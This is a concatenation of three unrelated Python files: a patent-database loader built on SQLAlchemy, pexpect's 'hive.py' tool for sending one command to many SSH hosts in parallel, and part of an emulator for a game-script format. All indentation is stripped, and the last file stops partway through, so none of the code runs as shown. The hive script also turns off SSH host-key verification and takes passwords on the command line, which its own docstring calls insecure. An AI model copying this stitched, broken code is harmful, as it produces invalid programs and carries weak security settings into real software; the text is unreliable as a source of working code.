"""
Copyright (c) 2013 The Regents of the University of California, AMERICAN INSTITUTES FOR RESEARCH
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
"""
@author Gabe Fierro [email protected] github.com/gtfierro
"""
"""
Helper functions for database-related functionality.
"""
import os
import re
import ConfigParser
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.sql import exists
from collections import defaultdict
import schema
from match import *
import uuid
from sqlalchemy import exc
from sqlalchemy import event
from sqlalchemy.pool import Pool
from HTMLParser import HTMLParser
h = HTMLParser()
def unescape_html(x):
return h.unescape(x)
import htmlentitydefs
_char = re.compile(r'&(\w+?);')
# Generate some extra HTML entities
defs=htmlentitydefs.entitydefs
defs['apos'] = "'"
entities = open('htmlentities').read().split('\n')
for e in entities:
try:
first = re.sub('\s+|\"|;|&','',e[3:15])
second = re.sub('\s+|\"|;|&','',e[15:24])
define = re.search("(?<=\s\s\').*?$",e).group()
defs[first] = define[:-1].encode('utf-8')
defs[second] = define[:-1].encode('utf-8')
except:
pass
def _char_unescape(m, defs=defs):
try:
return defs[m.group(1)].encode('utf-8','ignore')
except:
return m.group()
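# Illustrative example (hedged, not from the original code): substituting over a string
# with a known entity decodes it, e.g. _char.sub(_char_unescape, 'AT&amp;T') -> 'AT&T';
# unknown entities are left untouched because _char_unescape falls back to m.group().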
def fixid(x):
if 'id' in x:
x['id'] = str(uuid.uuid4())
elif 'uuid' in x:
x['uuid'] = str(uuid.uuid4())
return x
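# Illustrative example of fixid (values are hypothetical): any dict carrying an 'id' or
# 'uuid' key gets a fresh random identifier, e.g.
#   fixid({'id': '', 'city': 'Berkeley'}) -> {'id': '<new uuid4 string>', 'city': 'Berkeley'}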
@event.listens_for(Pool, "checkout")
def ping_connection(dbapi_connection, connection_record, connection_proxy):
"""
This keeps the database connection alive over long-running processes (like assignee and location disambiguations)
"""
cursor = dbapi_connection.cursor()
if not hasattr(cursor, 'MySQLError'):
return
try:
# reset the connection settings
cursor.execute("SELECT 1;")
if is_mysql():
cursor.execute("set foreign_key_checks = 0; set unique_checks = 0;")
except:
# raise DisconnectionError - pool will try
# connecting again up to three times before raising.
raise exc.DisconnectionError()
cursor.close()
def is_mysql():
"""
Returns True if currently connected to a MySQL database. Given that our only two options
    are MySQL and SQLite, we use this function to determine when we can use certain statements
    like `set foreign_key_checks = 0` and `truncate <tablename>`.
"""
config = get_config()
return config.get('global').get('database') == 'mysql'
def get_config(localfile="config.ini", default_file=True):
"""
This grabs a configuration file and converts it into
a dictionary.
    The default filename is config.ini.
    First we load the global file, then we overlay the local file on top of it.
"""
if default_file:
openfile = "{0}/config.ini".format(os.path.dirname(os.path.realpath(__file__)))
else:
openfile = localfile
config = defaultdict(dict)
if os.path.isfile(openfile):
cfg = ConfigParser.ConfigParser()
cfg.read(openfile)
for s in cfg.sections():
for k, v in cfg.items(s):
dec = re.compile(r'^\d+(\.\d+)?$')
if v in ("True", "False") or v.isdigit() or dec.match(v):
v = eval(v)
config[s][k] = v
# this enables us to load a local file
if default_file:
newconfig = get_config(localfile, default_file=False)
for section in newconfig:
for item in newconfig[section]:
config[section][item] = newconfig[section][item]
return config
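# Illustrative sketch of get_config() output, assuming a hypothetical config.ini containing:
#   [global]
#   database = sqlite
#   echo = False
# the call would return {'global': {'database': 'sqlite', 'echo': False}}, with boolean and
# numeric strings eval'd into Python values and any local config.ini merged over the defaults.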
def session_generator(db=None, dbtype='grant'):
"""
Read from config.ini file and load appropriate database
@db: string describing database, e.g. "sqlite" or "mysql"
@dbtype: string indicating if we are fetching the session for
the grant database or the application database
    session_generator will return an object that can be called
to retrieve more sessions, e.g.
sg = session_generator(dbtype='grant')
session1 = sg()
session2 = sg()
etc.
These sessions will be protected with the ping refresher above
"""
config = get_config()
echo = config.get('global').get('echo')
if not db:
db = config.get('global').get('database')
if db[:6] == "sqlite":
sqlite_db_path = os.path.join(
config.get(db).get('path'),
config.get(db).get('{0}-database'.format(dbtype)))
if os.path.basename(os.getcwd()) == 'lib':
sqlite_db_path = '../' + sqlite_db_path
engine = create_engine('sqlite:///{0}'.format(sqlite_db_path), echo=echo, echo_pool=True)
else:
engine = create_engine('mysql+mysqldb://{0}:{1}@{2}/{3}?charset=utf8'.format(
config.get(db).get('user'),
config.get(db).get('password'),
config.get(db).get('host'),
config.get(db).get('{0}-database'.format(dbtype)), echo=echo), pool_size=3, pool_recycle=3600, echo_pool=True)
if dbtype == 'grant':
schema.GrantBase.metadata.create_all(engine)
else:
schema.ApplicationBase.metadata.create_all(engine)
Session = sessionmaker(bind=engine, _enable_transaction_accounting=False)
return scoped_session(Session)
def fetch_session(db=None, dbtype='grant'):
"""
Read from config.ini file and load appropriate database
@db: string describing database, e.g. "sqlite" or "mysql"
@dbtype: string indicating if we are fetching the session for
the grant database or the application database
"""
config = get_config()
echo = config.get('global').get('echo')
if not db:
db = config.get('global').get('database')
if db[:6] == "sqlite":
sqlite_db_path = os.path.join(
config.get(db).get('path'),
config.get(db).get('{0}-database'.format(dbtype)))
engine = create_engine('sqlite:///{0}'.format(sqlite_db_path), echo=echo)
else:
engine = create_engine('mysql+mysqldb://{0}:{1}@{2}/{3}?charset=utf8'.format(
config.get(db).get('user'),
config.get(db).get('password'),
config.get(db).get('host'),
config.get(db).get('{0}-database'.format(dbtype)), echo=echo))
if dbtype == 'grant':
schema.GrantBase.metadata.create_all(engine)
else:
schema.ApplicationBase.metadata.create_all(engine)
Session = sessionmaker(bind=engine, _enable_transaction_accounting=False)
session = Session()
return session
def add_grant(obj, override=True, temp=False):
"""
    Converts a PatentGrant object into database tables via SQLAlchemy.
    Dates must be converted to datetime objects for SQLite (MySQL handles them as-is).
Case Sensitivity and Table Reflection
MySQL has inconsistent support for case-sensitive identifier names,
basing support on specific details of the underlying operating system.
However, it has been observed that no matter what case sensitivity
behavior is present, the names of tables in foreign key declarations
are always received from the database as all-lower case, making it
impossible to accurately reflect a schema where inter-related tables
use mixed-case identifier names.
Therefore it is strongly advised that table names be declared as all
lower case both within SQLAlchemy as well as on the MySQL database
itself, especially if database reflection features are to be used.
"""
# if a patent exists, remove it so we can replace it
(patent_exists, ), = grantsession.query(exists().where(schema.Patent.number == obj.patent))
#pat_query = grantsession.query(Patent).filter(Patent.number == obj.patent)
#if pat_query.count():
if patent_exists:
if override:
pat_query = grantsession.query(schema.Patent).filter(schema.Patent.id == obj.patent)
grantsession.delete(pat_query.one())
else:
return
if len(obj.pat["number"]) < 3:
return
pat = schema.Patent(**obj.pat)
pat.application = schema.Application(**obj.app)
# lots of abstracts seem to be missing. why?
add_all_fields(obj, pat)
if is_mysql():
grantsession.execute('set foreign_key_checks = 0;')
grantsession.execute('set unique_checks = 0;')
#grantsession.commit()
grantsession.merge(pat)
def add_all_fields(obj, pat):
add_asg(obj, pat)
add_inv(obj, pat)
add_law(obj, pat)
add_usreldoc(obj, pat)
add_classes(obj, pat)
add_ipcr(obj, pat)
add_citations(obj, pat)
add_claims(obj, pat)
add_current_classes(obj, pat)
def add_asg(obj, pat):
for asg, loc in obj.assignee_list:
asg = fixid(asg)
asg['organization'] = unescape_html(asg['organization'])
loc = fixid(loc)
asg = schema.RawAssignee(**asg)
loc = schema.RawLocation(**loc)
grantsession.merge(loc)
asg.rawlocation = loc
pat.rawassignees.append(asg)
def add_inv(obj, pat):
for inv, loc in obj.inventor_list:
inv = fixid(inv)
loc = fixid(loc)
inv = schema.RawInventor(**inv)
loc = schema.RawLocation(**loc)
grantsession.merge(loc)
inv.rawlocation = loc
pat.rawinventors.append(inv)
def add_law(obj, pat):
for law in obj.lawyer_list:
law = fixid(law)
law = schema.RawLawyer(**law)
pat.rawlawyers.append(law)
def add_usreldoc(obj, pat):
for usr in obj.us_relation_list:
usr = fixid(usr)
usr["rel_id"] = usr["number"]
usr = schema.USRelDoc(**usr)
pat.usreldocs.append(usr)
def add_classes(obj, pat):
for uspc, mc, sc in obj.us_classifications:
uspc = fixid(uspc)
uspc = schema.USPC(**uspc)
mc = schema.MainClass(**mc)
sc = schema.SubClass(**sc)
grantsession.merge(mc)
grantsession.merge(sc)
uspc.mainclass = mc
uspc.subclass = sc
pat.classes.append(uspc)
def add_current_classes(obj, pat):
for uspc_current, mc, sc in obj.us_classifications:
uspc_current = fixid(uspc_current)
uspc_current = schema.USPC_current(**uspc_current)
mc = schema.MainClass_current(**mc)
sc = schema.SubClass_current(**sc)
grantsession.merge(mc)
grantsession.merge(sc)
uspc_current.mainclass_current = mc
uspc_current.subclass_current = sc
pat.current_classes.append(uspc_current)
def add_ipcr(obj, pat):
for ipc in obj.ipcr_classifications:
ipc = schema.IPCR(**ipc)
pat.ipcrs.append(ipc)
def add_citations(obj, pat):
cits, refs = obj.citation_list
for cit in cits:
if cit['country'] == 'US':
# granted patent doc number
if re.match(r'^[A-Z]*\d+$', cit['number']):
cit['citation_id'] = cit['number']
cit = fixid(cit)
cit = schema.USPatentCitation(**cit)
pat.uspatentcitations.append(cit)
# if not above, it's probably an application
else:
cit['application_id'] = cit['number']
cit = fixid(cit)
cit = schema.USApplicationCitation(**cit)
pat.usapplicationcitations.append(cit)
# if not US, then foreign citation
else:
cit = fixid(cit)
cit = schema.ForeignCitation(**cit)
pat.foreigncitations.append(cit)
for ref in refs:
ref = fixid(ref)
ref = schema.OtherReference(**ref)
pat.otherreferences.append(ref)
def add_claims(obj, pat):
claims = obj.claims
for claim in claims:
claim = fixid(claim)
claim['text'] = unescape_html(claim['text'])
claim['text'] = _char.sub(_char_unescape,claim['text'])
clm = schema.Claim(**claim)
pat.claims.append(clm)
def commit():
try:
grantsession.commit()
except Exception, e:
grantsession.rollback()
print str(e)
def add_application(obj, override=True, temp=False):
"""
    Converts a PatentApplication object into database tables via SQLAlchemy.
    Dates must be converted to datetime objects for SQLite (MySQL handles them as-is).
Case Sensitivity and Table Reflection
MySQL has inconsistent support for case-sensitive identifier names,
basing support on specific details of the underlying operating system.
However, it has been observed that no matter what case sensitivity
behavior is present, the names of tables in foreign key declarations
are always received from the database as all-lower case, making it
impossible to accurately reflect a schema where inter-related tables
use mixed-case identifier names.
Therefore it is strongly advised that table names be declared as all
lower case both within SQLAlchemy as well as on the MySQL database
itself, especially if database reflection features are to be used.
"""
# if the application exists, remove it so we can replace it
(app_exists, ), = appsession.query(exists().where(schema.App_Application.number == obj.application))
if app_exists:
if override:
app_query = appsession.query(schema.App_Application).filter(schema.App_Application.number == obj.application)
appsession.delete(app_query.one())
else:
return
if len(obj.app["number"]) < 3:
return
app = schema.App_Application(**obj.app)
# lots of abstracts seem to be missing. why?
add_all_app_fields(obj, app)
appsession.merge(app)
def add_all_app_fields(obj, app):
add_app_asg(obj, app)
add_app_inv(obj, app)
add_app_classes(obj, app)
add_app_claims(obj, app)
add_app_current_classes(obj, app)
def add_app_asg(obj, app):
for asg, loc in obj.assignee_list:
loc = fixid(loc)
asg = fixid(asg)
asg['organization'] = unescape_html(asg['organization'])
asg = schema.App_RawAssignee(**asg)
loc = schema.App_RawLocation(**loc)
appsession.merge(loc)
asg.rawlocation = loc
app.rawassignees.append(asg)
def add_app_inv(obj, app):
for inv, loc in obj.inventor_list:
loc = fixid(loc)
inv = fixid(inv)
inv = schema.App_RawInventor(**inv)
loc = schema.App_RawLocation(**loc)
appsession.merge(loc)
inv.rawlocation = loc
app.rawinventors.append(inv)
def add_app_classes(obj, app):
for uspc, mc, sc in obj.us_classifications:
uspc = fixid(uspc)
uspc = schema.App_USPC(**uspc)
mc = schema.App_MainClass(**mc)
sc = schema.App_SubClass(**sc)
appsession.merge(mc)
appsession.merge(sc)
uspc.mainclass = mc
uspc.subclass = sc
app.classes.append(uspc)
def add_app_current_classes(obj, app):
for uspc_current, mc, sc in obj.us_classifications:
uspc_current = fixid(uspc_current)
uspc_current = schema.App_USPC_current(**uspc_current)
mc = schema.App_MainClass_current(**mc)
sc = schema.App_SubClass_current(**sc)
appsession.merge(mc)
appsession.merge(sc)
uspc_current.mainclass_current = mc
uspc_current.subclass_current = sc
app.current_classes.append(uspc_current)
def add_app_ipcr(obj, app):
for ipc in obj.ipcr_classifications:
ipc = schema.App_IPCR(**ipc)
app.ipcrs.append(ipc)
def add_app_claims(obj, app):
claims = obj.claims
for claim in claims:
claim = fixid(claim)
claim['text'] = unescape_html(claim['text'])
claim['text'] = _char.sub(_char_unescape,claim['text'])
clm = schema.App_Claim(**claim)
app.claims.append(clm)
def commit_application():
try:
appsession.commit()
except Exception, e:
appsession.rollback()
print str(e)
grantsession = fetch_session(dbtype='grant')
appsession = fetch_session(dbtype='application')
session = grantsession # default for clean and consolidate
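# Illustrative usage sketch for this module (the parsed-object names are assumptions, not
# part of this file): a grant parser would typically call
#   add_grant(parsed_patent_grant)
#   commit()
# and an application parser add_application(parsed_application) followed by commit_application().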
#!/usr/bin/env python
'''hive -- Hive Shell
This lets you ssh to a group of servers and control them as if they were one.
Each command you enter is sent to each host in parallel. The response of each
host is collected and printed. In normal synchronous mode Hive will wait for
each host to return the shell command line prompt. The shell prompt is used to
sync output.
Example:
$ hive.py --sameuser --samepass host1.example.com host2.example.net
username: myusername
password:
connecting to host1.example.com - OK
connecting to host2.example.net - OK
targeting hosts: 192.168.1.104 192.168.1.107
CMD (? for help) > uptime
=======================================================================
host1.example.com
-----------------------------------------------------------------------
uptime
23:49:55 up 74 days, 5:14, 2 users, load average: 0.15, 0.05, 0.01
=======================================================================
host2.example.net
-----------------------------------------------------------------------
uptime
23:53:02 up 1 day, 13:36, 2 users, load average: 0.50, 0.40, 0.46
=======================================================================
Other Usage Examples:
1. You will be asked for your username and password for each host.
hive.py host1 host2 host3 ... hostN
2. You will be asked once for your username and password.
This will be used for each host.
hive.py --sameuser --samepass host1 host2 host3 ... hostN
3. Give a username and password on the command-line:
hive.py user1:pass2@host1 user2:pass2@host2 ... userN:passN@hostN
You can use an extended host notation to specify username, password, and host
instead of entering auth information interactively. Where you would enter a
host name use this format:
username:password@host
This assumes that ':' is not part of the password. If your password contains a
':' then you can use '\\:' to indicate a ':' and '\\\\' to indicate a single
'\\'. Remember that this information will appear in the process listing. Anyone
on your machine can see this auth information. This is not secure.
This is a crude script that begs to be multithreaded. But it serves its
purpose.
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
from __future__ import print_function
from __future__ import absolute_import
# TODO add feature to support username:password@host combination
# TODO add feature to log each host output in separate file
import sys
import os
import re
import optparse
import time
import getpass
import readline
import atexit
try:
import pexpect
import pxssh
except ImportError:
sys.stderr.write("You do not have 'pexpect' installed.\n")
sys.stderr.write("On Ubuntu you need the 'python-pexpect' package.\n")
sys.stderr.write(" aptitude -y install python-pexpect\n")
exit(1)
try:
raw_input
except NameError:
raw_input = input
histfile = os.path.join(os.environ["HOME"], ".hive_history")
try:
readline.read_history_file(histfile)
except IOError:
pass
atexit.register(readline.write_history_file, histfile)
CMD_HELP='''Hive commands are preceded by a colon : (just think of vi).
:target name1 name2 name3 ...
set list of hosts to target commands
:target all
reset list of hosts to target all hosts in the hive.
:to name command
send a command line to the named host. This is similar to :target, but
sends only one command and does not change the list of targets for future
commands.
:sync
set mode to wait for shell prompts after commands are run. This is the
default. When Hive first logs into a host it sets a special shell prompt
pattern that it can later look for to synchronize output of the hosts. If
you 'su' to another user then it can upset the synchronization. If you need
to run something like 'su' then use the following pattern:
CMD (? for help) > :async
CMD (? for help) > sudo su - root
CMD (? for help) > :prompt
CMD (? for help) > :sync
:async
set mode to not expect command line prompts (see :sync). Afterwards
    commands are sent to target hosts, but their responses are not read back
until :sync is run. This is useful to run before commands that will not
return with the special shell prompt pattern that Hive uses to synchronize.
:refresh
refresh the display. This shows the last few lines of output from all hosts.
    This is similar to :resync, but does not expect the prompt. This is useful
for seeing what hosts are doing during long running commands.
:resync
This is similar to :sync, but it does not change the mode. It looks for the
    prompt and thus consumes all input from all targeted hosts.
:prompt
force each host to reset command line prompt to the special pattern used to
synchronize all the hosts. This is useful if you 'su' to a different user
where Hive would not know the prompt to match.
:send my text
    This will send 'my text' without a line feed to the targeted hosts.
    The output of the hosts is not automatically synchronized.
:control X
    This will send the given control character to the targeted hosts.
For example, ":control c" will send ASCII 3.
:exit
This will exit the hive shell.
'''
def login (args, cli_username=None, cli_password=None):
# I have to keep a separate list of host names because Python dicts are not ordered.
# I want to keep the same order as in the args list.
host_names = []
hive_connect_info = {}
hive = {}
# build up the list of connection information (hostname, username, password, port)
for host_connect_string in args:
hcd = parse_host_connect_string (host_connect_string)
hostname = hcd['hostname']
port = hcd['port']
if port == '':
port = None
if len(hcd['username']) > 0:
username = hcd['username']
elif cli_username is not None:
username = cli_username
else:
username = raw_input('%s username: ' % hostname)
if len(hcd['password']) > 0:
password = hcd['password']
elif cli_password is not None:
password = cli_password
else:
password = getpass.getpass('%s password: ' % hostname)
host_names.append(hostname)
hive_connect_info[hostname] = (hostname, username, password, port)
# build up the list of hive connections using the connection information.
for hostname in host_names:
print('connecting to', hostname)
try:
            fout = open("log_" + hostname, "w")
hive[hostname] = pxssh.pxssh()
# Disable host key checking.
hive[hostname].SSH_OPTS = (hive[hostname].SSH_OPTS
+ " -o 'StrictHostKeyChecking=no'"
+ " -o 'UserKnownHostsFile /dev/null' ")
hive[hostname].force_password = True
hive[hostname].login(*hive_connect_info[hostname])
print(hive[hostname].before)
hive[hostname].logfile = fout
print('- OK')
except Exception as e:
print('- ERROR', end=' ')
print(str(e))
print('Skipping', hostname)
hive[hostname] = None
return host_names, hive
def main ():
global options, args, CMD_HELP
rows = 24
cols = 80
if options.sameuser:
cli_username = raw_input('username: ')
else:
cli_username = None
if options.samepass:
cli_password = getpass.getpass('password: ')
else:
cli_password = None
host_names, hive = login(args, cli_username, cli_password)
synchronous_mode = True
target_hostnames = host_names[:]
    print('targeting hosts:', ' '.join(target_hostnames))
while True:
cmd = raw_input('CMD (? for help) > ')
cmd = cmd.strip()
if cmd=='?' or cmd==':help' or cmd==':h':
print(CMD_HELP)
continue
elif cmd==':refresh':
refresh (hive, target_hostnames, timeout=0.5)
for hostname in target_hostnames:
print('/' + '=' * (cols - 2))
print('| ' + hostname)
print('\\' + '-' * (cols - 2))
if hive[hostname] is None:
print('# DEAD: %s' % hostname)
else:
print(hive[hostname].before)
print('#' * 79)
continue
elif cmd==':resync':
resync (hive, target_hostnames, timeout=0.5)
for hostname in target_hostnames:
print('/' + '=' * (cols - 2))
print('| ' + hostname)
print('\\' + '-' * (cols - 2))
if hive[hostname] is None:
print('# DEAD: %s' % hostname)
else:
print(hive[hostname].before)
print('#' * 79)
continue
elif cmd==':sync':
synchronous_mode = True
resync (hive, target_hostnames, timeout=0.5)
continue
elif cmd==':async':
synchronous_mode = False
continue
elif cmd==':prompt':
for hostname in target_hostnames:
try:
if hive[hostname] is not None:
hive[hostname].set_unique_prompt()
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
continue
elif cmd[:5] == ':send':
cmd, txt = cmd.split(None,1)
for hostname in target_hostnames:
try:
if hive[hostname] is not None:
hive[hostname].send(txt)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
continue
elif cmd[:3] == ':to':
cmd, hostname, txt = cmd.split(None,2)
print('/' + '=' * (cols - 2))
print('| ' + hostname)
print('\\' + '-' * (cols - 2))
if hive[hostname] is None:
print('# DEAD: %s' % hostname)
continue
try:
hive[hostname].sendline (txt)
hive[hostname].prompt(timeout=2)
print(hive[hostname].before)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
continue
elif cmd[:7] == ':expect':
cmd, pattern = cmd.split(None,1)
print('looking for', pattern)
try:
for hostname in target_hostnames:
if hive[hostname] is not None:
hive[hostname].expect(pattern)
print(hive[hostname].before)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
continue
elif cmd[:7] == ':target':
target_hostnames = cmd.split()[1:]
            if len(target_hostnames) == 0 or target_hostnames[0] == 'all':
target_hostnames = host_names[:]
            print('targeting hosts:', ' '.join(target_hostnames))
continue
elif cmd == ':exit' or cmd == ':q' or cmd == ':quit':
break
elif cmd[:8] == ':control' or cmd[:5] == ':ctrl' :
cmd, c = cmd.split(None,1)
if ord(c)-96 < 0 or ord(c)-96 > 255:
print('/' + '=' * (cols - 2))
print('| Invalid character. Must be [a-zA-Z], @, [, ], \\, ^, _, or ?')
print('\\' + '-' * (cols - 2))
continue
for hostname in target_hostnames:
try:
if hive[hostname] is not None:
hive[hostname].sendcontrol(c)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
continue
elif cmd == ':esc':
for hostname in target_hostnames:
if hive[hostname] is not None:
hive[hostname].send(chr(27))
continue
#
# Run the command on all targets in parallel
#
for hostname in target_hostnames:
try:
if hive[hostname] is not None:
hive[hostname].sendline (cmd)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
#
# print the response for each targeted host.
#
if synchronous_mode:
for hostname in target_hostnames:
try:
print('/' + '=' * (cols - 2))
print('| ' + hostname)
print('\\' + '-' * (cols - 2))
if hive[hostname] is None:
print('# DEAD: %s' % hostname)
else:
hive[hostname].prompt(timeout=2)
print(hive[hostname].before)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
print('#' * 79)
def refresh (hive, hive_names, timeout=0.5):
'''This waits for the TIMEOUT on each host.
'''
# TODO This is ideal for threading.
for hostname in hive_names:
if hive[hostname] is not None:
hive[hostname].expect([pexpect.TIMEOUT,pexpect.EOF],timeout=timeout)
def resync (hive, hive_names, timeout=2, max_attempts=5):
'''This waits for the shell prompt for each host in an effort to try to get
them all to the same state. The timeout is set low so that hosts that are
already at the prompt will not slow things down too much. If a prompt match
    is made for a host then keep asking until it stops matching. This is a
best effort to consume all input if it printed more than one prompt. It's
kind of kludgy. Note that this will always introduce a delay equal to the
timeout for each machine. So for 10 machines with a 2 second delay you will
get AT LEAST a 20 second delay if not more. '''
# TODO This is ideal for threading.
for hostname in hive_names:
if hive[hostname] is not None:
for attempts in range(0, max_attempts):
if not hive[hostname].prompt(timeout=timeout):
break
def parse_host_connect_string (hcs):
'''This parses a host connection string in the form
    username:password@hostname:port. All fields are optional except hostname. A
dictionary is returned with all four keys. Keys that were not included are
set to empty strings ''. Note that if your password has the '@' character
then you must backslash escape it. '''
if '@' in hcs:
p = re.compile (r'(?P<username>[^@:]*)(:?)(?P<password>.*)(?!\\)@(?P<hostname>[^:]*):?(?P<port>[0-9]*)')
else:
p = re.compile (r'(?P<username>)(?P<password>)(?P<hostname>[^:]*):?(?P<port>[0-9]*)')
m = p.search (hcs)
d = m.groupdict()
d['password'] = d['password'].replace('\\@','@')
return d
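# Illustrative example (hedged, not from the original docstring):
#   parse_host_connect_string('noah:[email protected]:2222')
# should yield {'username': 'noah', 'password': 'secret',
#               'hostname': 'host.example.com', 'port': '2222'},
# while a bare 'host.example.com' leaves username, password, and port as empty strings.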
if __name__ == '__main__':
start_time = time.time()
parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter(), usage=globals()['__doc__'], version='$Id: hive.py 533 2012-10-20 02:19:33Z noah $',conflict_handler="resolve")
parser.add_option ('-v', '--verbose', action='store_true', default=False, help='verbose output')
parser.add_option ('--samepass', action='store_true', default=False, help='Use same password for each login.')
parser.add_option ('--sameuser', action='store_true', default=False, help='Use same username for each login.')
(options, args) = parser.parse_args()
if len(args) < 1:
parser.error ('missing argument')
if options.verbose: print(time.asctime())
main()
if options.verbose: print(time.asctime())
if options.verbose: print('TOTAL TIME IN MINUTES:', end=' ')
if options.verbose: print((time.time() - start_time) / 60.0)
#**************************************************************************#
# This file is part of pymsc which is released under MIT License. See file #
# LICENSE or go to https://github.com/jam1garner/pymsc/blob/master/LICENSE #
# for full license details. #
#**************************************************************************#
import struct
from sys import argv
from msc import *
from param import *
from time import sleep
from random import randint,random
from os.path import isfile
from argparse import ArgumentParser
from math import sqrt, cos, sin, atan2
class FunctionInfo:
def __init__(self, thisLocalVarPos, returnAddress, stackPos):
self.localVarPos = thisLocalVarPos
self.returnAddress = returnAddress
self.stackPos = stackPos
def restore(self):
global evalPos, localVarPos
localVarPos = self.localVarPos
        evalPos = self.returnAddress
#Simulate an MSC syscall given its number, argument list, and push bit
def syscall(syscallNum, args, pushBit):
global sharedVars,evalPos,stack,y_unit
#Random int in range
if syscallNum == 0x9:
push(randint(args[0], args[1]-1), pushBit)
#Variable access
elif syscallNum == 0x16:
operation = args[0]
if operation == 0x6:
if not args[1] in sharedVars:
print("ERROR: Variable 0x%08X doesn't not exist (Accessed at %X)" % (args[1],evalPos))
quit()
else:
push(sharedVars[args[1]], pushBit)
elif operation == 0x7:
sharedVars[args[2]] = args[1]
elif operation == 0x10:
if not args[1] in sharedVars:
print("ERROR: Variable 0x%08X doesn't not exist (Accessed at %X)" % (args[1],evalPos))
quit()
else:
push(0 if sharedVars[args[1]] == 0 else 1, pushBit)
elif operation == 0x2710:
sharedVars[args[1]] = 0
elif operation == 0x2711:
sharedVars[args[1]] = 1
elif syscallNum == 0xA:
operation = args[0]
if operation == 0: #sqrt
push(sqrt(intToFloat(args[1])),pushBit)
elif operation == 1: #angle
push(atan2(intToFloat(args[1]), intToFloat(args[2])),pushBit)
elif operation == 2:
push(intToFloat(args[1])**args[2],pushBit)
elif operation == 3:
push(sqrt((intToFloat(args[1])**2)+(intToFloat(args[2])**2)+(intToFloat(args[3])**2)),pushBit)
elif operation == 4:
push(cos(intToFloat(args[1])),pushBit)
elif operation == 5:
push(sin(intToFloat(args[1])),pushBit)
elif operation == 6:
push(random(), pushBit)
elif operation == 7:
push(abs(atan2(intToFloat(args[1]), intToFloat(args[2])) - atan2(intToFloat(args[3]), intToFloat(args[4]))),pushBit)
elif operation == 8:
push(y_unit, pushBit)
elif operation == 0xA:
mag = sqrt((intToFloat(args[1])**2)+(intToFloat(args[2])**2))
x = intToFloat(args[1]) / mag
y_unit = intToFloat(args[2]) / mag
push(x,pushBit)
#Variable access
elif syscallNum == 0x17:
operation = args[0]
if operation == 0x0:
if not args[1] in sharedVars:
print("ERROR: Variable 0x%08X doesn't not exist (Accessed at %X)" % (args[1],evalPos))
quit()
else:
push(sharedVars[args[1]], pushBit)
#Debug stack dump
elif syscallNum == 0xF0:
stackString = "DEBUG: ["
for i in range(len(stack)):
if stack[i] != None:
stackString += ('*' if i == stackPos else '') + hex(stack[i]) + (', ' if i != len(stack) - 1 else '')
if stackString != "[":
stackString = stackString[:-2]
print("Stack [Position = %i] - %s" % (stackPos, str([intToFloat(j) if j else 0 for j in stack])))
#Debug var print
elif syscallNum == 0xF1:
if len(args) == 0:
l = tuple(["0x%08X : 0x%08X, " % (i,j) for i,j in sharedVars.items()])
print('DEBUG: {' + (('%s' * len(l)) % l).rstrip(', ') + '}')
else:
if args[0] in sharedVars:
print("DEBUG: 0x%08X = 0x%08X" % (args[0], sharedVars[args[0]]))
else:
print("ERROR: Unsupported syscall 0x%X at location %X" % (syscallNum,evalPos))
quit()
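#Illustrative example (hedged): syscall 0x9 is the random-int-in-range call handled above, so
#  syscall(0x9, [1, 10], True)
#pushes a random integer in the range [1, 9] (randint(args[0], args[1]-1)) onto the emulated stack.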
